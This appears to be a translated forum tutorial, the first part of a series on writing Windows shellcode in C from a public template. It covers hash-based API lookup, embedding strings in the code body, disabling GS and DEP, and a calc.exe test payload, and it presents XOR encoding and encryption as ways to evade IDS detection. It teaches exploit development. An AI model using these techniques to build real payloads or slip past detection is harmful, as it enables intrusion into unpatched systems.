[Shellcode framework (2)] Improving the shellcode framework
https://bbs.pediy.com/thread-216661.htm
[Shellcode framework (3)] Fixing small bugs in the shellcode framework
https://bbs.pediy.com/thread-216673.htm
[Shellcode framework (4)] Shellcode programming tips
https://bbs.pediy.com/thread-216674.htm
[Shellcode framework (5)] Multi-file shellcode framework
https://bbs.pediy.com/thread-217040.htm
I have put everything I have learned into this series, in the hope that newcomers to this field will not take unnecessary detours.

Understanding shellcode

Shellcode is in fact a piece of code (it can also be padding data) that is sent to a server to exploit a specific vulnerability, usually in order to gain privileges. Shellcode is normally delivered to the attacked server as data. Shellcode is the core of overflow exploits and worms; mention it and vulnerabilities naturally come to mind, since shellcode is only useful against hosts that have not been patched. The tens of thousands of vulnerable servers stubbornly running on the network are a rich feast for hackers and virus writers. The most critical part of exploiting a vulnerability is writing the shellcode. Because the discoverer of a vulnerability does not usually publish complete shellcode at first, mastering shellcode writing is especially important. (From Baidu Baike: http://baike.baidu.com/link?url=3YqpOe7gRddlo6xMoMwEYhtprTNBTtWdvNTuaVq5Xo8Nucd9Kb7DZj1_GmWX1DGb8MN2iGIiJ6jIBgsOKbLnJD58lp0m0_PECdGTXPXSqgW)
Factors to consider when writing shellcode

1. The language the shellcode is written in.
4. Shellcode encoding.
5. Polymorphism to evade IDS detection.

These issues are raised in the Baike article, and they are exactly the problems shellcode development has to solve. There are in fact many more; I will not list them all here, since many of them will surface during later development, and we will discuss them as they appear, which makes them easier to remember.
Here is a brief answer to each of the points above, in terms of this series:

1. Language: we use C, with Visual Studio 2010 as the development environment; some code is written as inline assembly (for example, reading special addresses such as the TEB and PEB). C is simple and readable, which greatly lowers the entry barrier; it is portable, and with small changes in VS the same code can directly produce ARM or x64 shellcode; and VS's powerful debugger helps us find bugs, so we can say goodbye to OllyDbg.
2. Relocation.
3. Locating API addresses: we use the most popular method, comparing hashes of function names. The function name is reduced to a hash (a DWORD); while walking a DLL's export table, each exported name is hashed and compared with the hash stored in the shellcode to identify the API and thereby its address. Function names are not stored directly in the shellcode in order to keep its size down.
4. Encoding.
5. Evading IDS detection: by adding XOR encoding and decoding, decompression, encryption and decryption and so on, we can produce endless variants of the shellcode; there will always be one that fits.
Deploying the C shellcode framework

Here I use TK's shellcode template directly: https://github.com/tombkeeper/Shellcode_Template_in_C

After downloading and unpacking there are three files: shellcode.c, gethash.c and str2intarr.c. shellcode.c is the template itself; all later work builds on it. gethash.c computes the hash of each function name to be used, so that the shellcode can locate the function's address by hash. str2intarr.c embeds string resources directly into the shellcode for its own use (normally the compiler places string literals in the PE file's data sections, but our shellcode cannot keep strings anywhere other than inside its own body, so that it can always compute their addresses correctly).
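To make the roles of gethash.c and str2intarr.c (and the hash lookup from point 3 above) concrete, here is an added, portable C example; it is not code from TK's template. The hash is the multiply-by-33 loop that this template's shellcode compiles to (if you change the hash in shellcode.c, change it here too), and the export-name table is a constructed stand-in for the real PE export directory.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
/* Equivalent of gethash.c: the name hash the shellcode compares against
   export names. h = h*33 + c with seed 0, the loop this template compiles to. */
uint32_t hash_name(const char *name)
{
    uint32_t h = 0;
    while (*name)
        h = (h << 5) + h + (uint32_t)(unsigned char)*name++;
    return h;
}
/* What the shellcode does at run time: hash every name in a DLL's export
   name table and compare with the stored hash. `names` is a constructed
   stand-in for the real AddressOfNames array of the PE export directory. */
int find_by_hash(const char *const *names, int count, uint32_t want)
{
    for (int i = 0; i < count; i++)
        if (hash_name(names[i]) == want)
            return i;   /* index into AddressOfNameOrdinals -> function RVA */
    return -1;
}
/* Equivalent of str2intarr.c: pack a string into little-endian DWORDs plus a
   zero DWORD, so it can be written as stack immediates inside the shellcode
   ("calc" -> 0x636C6163, 0x00000000) instead of living in a data section. */
int str2intarr(const char *s, uint32_t *out, int max)
{
    size_t len = strlen(s); int n = 0;
    for (size_t i = 0; i < len && n < max; i += 4, n++) {
        uint32_t d = 0;
        for (size_t k = 0; k < 4 && i + k < len; k++)
            d |= (uint32_t)(unsigned char)s[i + k] << (8 * k);
        out[n] = d;
    }
    if (n < max) out[n++] = 0;   /* NUL terminator / padding to a whole DWORD */
    return n;
}
int main(void)
{
    /* Constructed export-name table; a real one has hundreds of entries. */
    static const char *const exports[] = { "CreateProcessA", "ExitProcess", "WinExec" };
    uint32_t words[8];
    int n = str2intarr("calc", words, 8);
    printf("hash(WinExec)=0x%08X index=%d\n", hash_name("WinExec"),
           find_by_hash(exports, 3, hash_name("WinExec")));
    for (int i = 0; i < n; i++)
        printf("0x%08X%s", words[i], i + 1 < n ? "," : "\n");
    return 0;
}
```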
Deploying shellcode.c

1. Open VS2010 and create a new project: Visual C++ -> Win32 -> Win32 Console Application; any name will do; under Application options choose Empty project.
2. Put shellcode.c in the project directory and drag it into the new project.
3. Right-click shellcode.c: Properties -> C/C++ -> Precompiled Headers -> Precompiled Header: choose "Not Using Precompiled Headers". shellcode.c is a C file, so it does not use a precompiled header.
4. Set the project to Release mode, and in the project properties set C/C++ -> Optimization -> Optimization to Disabled or Minimize Size (/O1) (use Disabled while debugging and /O1 when producing the final shellcode).
5. Comment out void __declspec(naked) StartSign (){}
6. Change the main function in shellcode.c as shown below.
7. Disable the GS buffer security check and DEP in the project properties.
// original
void main(void)
{
    DWORD ShellCodeSize;
    // size is measured from StartSign, which step 5 commented out
    ShellCodeSize = (DWORD)EndSign - (DWORD)StartSign;
    ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
    // ShellCode();
}

// modified
void main(void)
{
    DWORD ShellCodeSize;
    // measure from the ShellCode function itself, since StartSign is gone
    ShellCodeSize = (DWORD)EndSign - (DWORD)ShellCode;
    ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
    getchar();      // pause so the hex dump can be read before the shellcode runs
    ShellCode();    // execute the shellcode in-process for testing
}
Now the shellcode project can be built and run.
Running shellcode.exe from cmd also prints the shellcode as a hexadecimal array.
Running it directly should pop up calc.exe.
DWORD ShellCodeSize = 496;
This is the output with optimization Disabled; it contains many 0xCC bytes (the compiler's padding between functions).
DWORD ShellCodeSize = 201;
With /O1 optimization enabled the shellcode is only 201 bytes.